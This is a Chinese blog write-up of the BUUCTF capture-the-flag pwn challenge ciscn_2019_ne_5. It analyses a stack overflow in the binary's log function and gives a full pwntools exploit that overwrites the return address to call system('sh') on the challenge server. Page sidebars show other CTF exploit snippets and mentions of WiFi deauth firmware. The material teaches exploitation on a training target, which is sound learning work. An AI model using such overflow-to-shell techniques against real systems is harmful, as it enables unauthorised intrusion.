buuctf|pwn-ciscn_2019_ne_5-wp

最新推荐文章于 2022-08-31 14:51:02 发布
最新推荐文章于 2022-08-31 14:51:02 发布
阅读量202 收藏
点赞数 1
分类专栏: CTF 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2645470582_/article/details/121225412
版权

1.例行检查保护机制

 

2.我们用32位的IDA打开该文件

shift+f12查看关键字符串

我们看到flag就是我们输入的log

3.我们看看main函数里面有什么

 

 我们看到第一个条件s1 == 'administrator'

 进入过后,v3是你想要选择执行的内容

 ADDLog():我们看到这里是输入log,跟我们的flag有关系

                          a1是我们外面传进来的src = 48,读取128个就造成了溢出

 

Display():没什么有用的

 

Print():

 GetFlag():我们看到了flag

 exit():

 

4.构造system("/bin/sh")

sh

ROPgadget --binary ciscn_2019_ne_5 --string 'sh'

 这个system地址不对

 所以我们用

system_addr = elf.sym['system']

5.EXP

判断libc版本32位:
        b'a' * offset + p32(xx@plt) + p32(ret_addr(main_addr或者_start_addr)) + p32(xx@got)

getshell:
        b'a' * offset +p32(system_addr) + b'a'*4 + p32(str_bin_sh)

#encoding = utf-8
from pwn import *

context(os = 'linux',arch = 'i386',log_level = 'debug')
content = 0
elf = ELF('./ciscn_2019_ne_5')

def main():
	if content == 1:
		p = process('ciscn_2019_ne_5')
	else:
		p =remote('node4.buuoj.cn',27287)
	 
	#0x080482ea : sh
	sh_addr     = 0x080482ea
	system_addr = elf.sym['system']
	payload     = b'a' * (0x48+0x4) + p32(system_addr) + b'aaaa' + p32(sh_addr)
	
	p.sendlineafter("Please input admin password:",'administrator')
	p.sendlineafter("0.Exit\n:",'1')
	p.sendlineafter("Please input new log info:",payload)
	p.sendlineafter("0.Exit\n:",'4')
	
	p.interactive()
main()

 

L__y
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ciscn_2019_ne_5【BUUCTF
qq_41696518的博客
08-31 532
ciscn_2019_ne_5 BUUCTF
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 396
buuctf-pwn 001-016题wp
BUU-ciscn_2019_ne_5
qq_45771413的博客
04-27 311
检查保护 IDA 逻辑不是很复杂, 第一次提示输入admin密码,密码要输入administrator才能下一步 接着是输入功能选项(0~3) 第一个输入,看起来没啥用,但是传入的是src字符串,返回的也是src 第二个输出,进去只有一个put,一无所有 第三个是打印,里面发现了system函数 第四个本应该是’0’选项,这里多了个’4’,函数名叫getflag,进去看是个输出flag的函数,初步预测跳转到这里就可以了。 第五个才是’0’的退出 int __cdecl main(int argc,
PWN刷题记录(1)--ciscn_2019_n_5
小心信科理化声
05-10 301
这是第一篇的刷题记录,从ret2text开始刷起 0x1 程序分析 先checksec 一下 64位的小端序,NX没开启,妥妥的写shellcode 拖入IDA中查看一下 main函数如下 可以看到gets(text)有明显的溢出 然后还可以看到关键的read函数,可以做libc泄露用,先留着 然后查找一下有没有能用到的system函数和binsh 无system函数 估计也没有binsh了 咋办呢>? 看一下有没有可读可写可执行的字段呢? 看看这里的两个变量:name\text 存在!
[BUUCTF-pwn]——ciscn_2019_ne_5
Y_peak的博客
02-11 380
[BUUCTF-pwn]——ciscn_2019_ne_5 题目地址:https://buuoj.cn/challenges#ciscn_2019_ne_5 checksec下 在IDA中,竟然不给我反汇编,第一次碰到. 查了下解决方法,在反汇编失败的地方,单独反汇编就好. int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // [esp+0h] [ebp-100h] char src[4]
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
BUUCTF-Pwn-ciscn_2019_ne_5
餐桌上的猫
03-25 127
exp from pwn import* elf=ELF('/home/lhb/桌面/ciscn_2019_ne_5') p=remote('node4.buuoj.cn',28555) str_sh=0x80482EA system_plt=elf.plt['system'] p.sendline(b'administrator') p.sendline(b'1') payload=b'a'*(0x48+4)+p32(system_plt)+b'a'*4+p32(str_sh) p.sendline(
[BUUCTF]PWN——ciscn_2019_ne_5
mcmuyanga的博客
10-04 1972
ciscn_2019_ne_5 题目附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,看一下程序的大概执行情况 32位ida载入,shift+f12查看程序里的字符串,发现了flag字符串 双击跟进,ctrl+x找到调用的函数,得到提示我们输入的log就是flag 看一下main函数,s1在接收admin的密码administrator,这边读入了100个长度的字符,看到15行,给s1的大小只有48,这边存在溢出漏洞 根据之前那个flag的提示,之后我们应该选1,添加一个log,之后
BUUCTF(pwn)ciscn_2019_ne_5
半岛铁盒的博客
03-30 201
先点进去 cat flag 说了 在 1 log中 from pwn import* r=remote('node3.buuoj.cn',26204) sys=0x80486b9 sh=0x080482ea r.sendlineafter("Please input admin password:",administrator) r.sendlineafter("0.Exit\n:",1) payload='a'*(0x48+4)+p32(sys)+p32(sh) r.sendlineaf...
[BUUCTF]PWN6——ciscn_2019_c_1
mcmuyanga的博客
08-25 6809
[BUUCTF]PWN6——ciscn_2019_c_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_c_1 步骤: 例行检查,64位,开启了nx保护 nc一下,看看输入点的字符串,三个选项加密、解密、退出 用64位ida打开,先是shift+f12查看一下程序里的字符串 没有发现system函数和字符串“bin/sh”,先根据输入点的字符串查看一下主要函数 就像一开始说的程序的功能就是加密和解密,看伪代码可以知道,只有选1的时候才会调用encrypt()
[BUUCTF]PWN------rip
BangSen1的博客
01-13 315
rip 例行检查,无保护 运行一下,输出了我们输入的东西, 用64位IDA打开,看到了/bin/sh
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2
Y_peak的博客
02-14 260
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2 题目地址:https://buuoj.cn/challenges#[HarekazeCTF2019]baby_rop2 checksec一下,64位,开启NX,应该要用到ROPgadget,先看看 在IDA中 思路 利用printf先leek出来一个地址,这里选用了read的地址。找到libc,计算偏移,最终算出,system函数地址和’/bin/sh’字符串的地址。由于是64位,注意寄存器储存参数。(参数小于等于
BUUCTF(pwn)[HarekazeCTF2019]baby_rop
半岛铁盒的博客
03-29 140
因为是64位参数是储存在寄存器中,binsh字符串应该放在 rdi 寄存器中 from pwn import* p = remote("node3.buuoj.cn",28711) rdi=0x400683 sys=0x4005e3 bin=0x601048 payload='a'*(0x10+8)+p64(rdi)+p64(bin)+p64(sys) p.sendline(payload) flag不在根目录下,需要我们找一下,利用find -name flag找一下 find -name "fla.
BUUCTF PWN部分题目wp
awxnutpgs545144602的博客
08-16 2006
pwn好难啊 PWN 1,连上就有flag的pwnnc buuoj.cn 6000得到flag 2,RIP覆盖一下用ida分析一下,发现已有了system,只需覆盖RIP为fun()的地址,用peda计算偏移为23,写脚本 from pwn import* sh=remote('f.b...
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值